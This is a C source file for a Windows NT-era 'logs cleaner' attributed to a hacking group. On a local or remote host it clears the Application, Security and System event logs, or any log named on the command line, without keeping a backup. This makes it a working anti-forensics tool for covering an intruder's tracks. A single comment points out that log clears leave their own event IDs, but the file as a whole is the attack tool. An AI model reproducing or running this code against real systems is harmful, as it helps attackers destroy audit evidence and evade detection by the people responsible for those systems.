/*
	______            _  _   __            _ 
	| ___ \          | || | / /           | |
	| |_/ /  ___   __| || |/ /   ___    __| |
	|    /  / _ \ / _` ||    \  / _ \  / _` |
	| |\ \ |  __/| (_| || |\  \| (_) || (_| |
	\_| \_| \___| \__,_|\_| \_/ \___/  \__,_|
                                          
   Logs Cleaner for WinNT Systems (nt4?, 2k, XP)

                - Version 0.1 -
                                      RedKod Team
                                    www.redkod.com
Coder: R-e-D
Mail : r-e-d@redkod.com

*/

#include <windows.h>
#include <stdio.h>
#include <string.h>

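/*
 * Build a heap copy of the system message text for the calling thread's
 * last-error code.
 *
 * The returned buffer is allocated with GlobalAlloc(); the caller owns it
 * and should release it with GlobalFree().  NULL is returned only when
 * that allocation fails.  When the system has no text for the code, a
 * generic "Unknown error <code>." line is returned instead.
 */
char *DisplayError(void)
{
	/* Read the code first: any later API call may overwrite it. */
	DWORD code = GetLastError();
	DWORD written;
	LPSTR message = NULL;
	char fallback[64];
	const char *text;
	size_t length;
	char *buffer;

	/* The ANSI variant is named explicitly because the result is handled as char *. */
	written = FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL,
		code, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPSTR)&message, 0, NULL);

	if(written == 0 || message == NULL)
	{
		/* FormatMessage failed: `message` must not be read, so report the bare code. */
		sprintf(fallback, "Unknown error %lu.\n", (unsigned long)code);
		text = fallback;
	}
	else
	{
		text = message;
	}

	length = strlen(text);
	buffer = (char *)GlobalAlloc(GPTR, length + 1);
	if(buffer != NULL)
		memcpy(buffer, text, length + 1);

	/* FORMAT_MESSAGE_ALLOCATE_BUFFER hands ownership of `message` to us. */
	if(message != NULL)
		LocalFree(message);

	return(buffer);
}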

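/*
 * Obtain an event-source handle for `type` on `host` with
 * RegisterEventSource() and pass it to ClearEventLog() with no backup file.
 *
 * Returns 0 when ClearEventLog() reports success, -1 otherwise (including
 * a NULL `type`).  Failure text goes to stderr, the success line to stdout.
 *
 * Defensive note: Windows records the clearing of a log as an event of its
 * own (Security log: event ID 517 on the NT-era systems named in the file
 * header, 1102 on later releases; other logs: event ID 104 in the System
 * log on later releases).  Alerting on those events and forwarding logs
 * off-host keeps a record that a local clear cannot remove.
 */
int ErareLog(const char *host, const char *type)
{
	HANDLE hEvent;
	char *reason;
	int status = -1;

	if(type == NULL)
	{
		/* A NULL name would otherwise reach the API and the "%s" below. */
		fprintf(stderr, "No event log type given.\n");
		return(-1);
	}

	hEvent = RegisterEventSource(host, type);
	if(hEvent == NULL)
	{
		reason = DisplayError();
		fprintf(stderr, "Could not register event source. %s", reason != NULL ? reason : "\n");
		if(reason != NULL)
			GlobalFree(reason);
		return(-1);
	}

	if(ClearEventLog(hEvent, NULL) == 0)
	{
		/* Fetch the text before another API call can overwrite the last-error code. */
		reason = DisplayError();
		fprintf(stderr, "Error while erasing the logfile. %s", reason != NULL ? reason : "\n");
		if(reason != NULL)
			GlobalFree(reason);
	}
	else
	{
		fprintf(stdout, "[*] %s log erased.\n", type);
		status = 0;
	}

	/* Release the handle on both paths; it was leaked when the clear failed. */
	DeregisterEventSource(hEvent);

	return(status);
}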

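/*
 * Entry point: print the banner, then dispatch on the option letter in
 * argv[2] and call ErareLog() with argv[1] as the host.
 *
 * Returns 0 when every requested ErareLog() call returned 0, and -1 on a
 * usage error or when any call failed.
 */
int main(int argc, char **argv)
{
	const char *version = "\nLogs cleaner 0.1 for WinNT systems by R-e-D\n"
					"\thttp://www.redkod.com/\n"
					"\t   r-e-d@redkod.com\n\n";
	char option;
	int status = 0;

	fprintf(stdout, "%s", version);

	if(argc < 3)
	{
		fprintf(stdout, "Usage : %s [\\ComputerName] <-a (Applications) / -e (Security) / -s (System) / -r (All) / -t <name> >\n", argv[0]);
		return(-1);
	}

	/* An empty argv[2] has no second character; reading it would run past the terminator. */
	option = (argv[2][0] != '\0') ? argv[2][1] : '\0';

	switch(option)
	{
	case 'a':
		/* Applications */
		status = ErareLog(argv[1], "Applications");
		break;
	case 'e':
		/* Security */
		status = ErareLog(argv[1], "Secu");
		break;
	case 's':
		/* System */
		status = ErareLog(argv[1], "System");
		break;
	case 'r':
		/* All: attempt each one and report failure if any of them failed */
		if(ErareLog(argv[1], "Applications") != 0)
			status = -1;
		if(ErareLog(argv[1], "Secu") != 0)
			status = -1;
		if(ErareLog(argv[1], "System") != 0)
			status = -1;
		break;
	case 't':
		/* Type specified by user: argv[3] exists only when argc is at least 4 */
		if(argc < 4)
		{
			fprintf(stdout, "Please, specify a correct event log type.\n");
			return(-1);
		}
		status = ErareLog(argv[1], argv[3]);
		break;
	default:
		/* Unknown or missing option letter */
		fprintf(stdout, "Please, specify a correct event log type.\n");
		return(-1);
	}

	/* Propagate failures instead of always exiting with 0. */
	return(status);
}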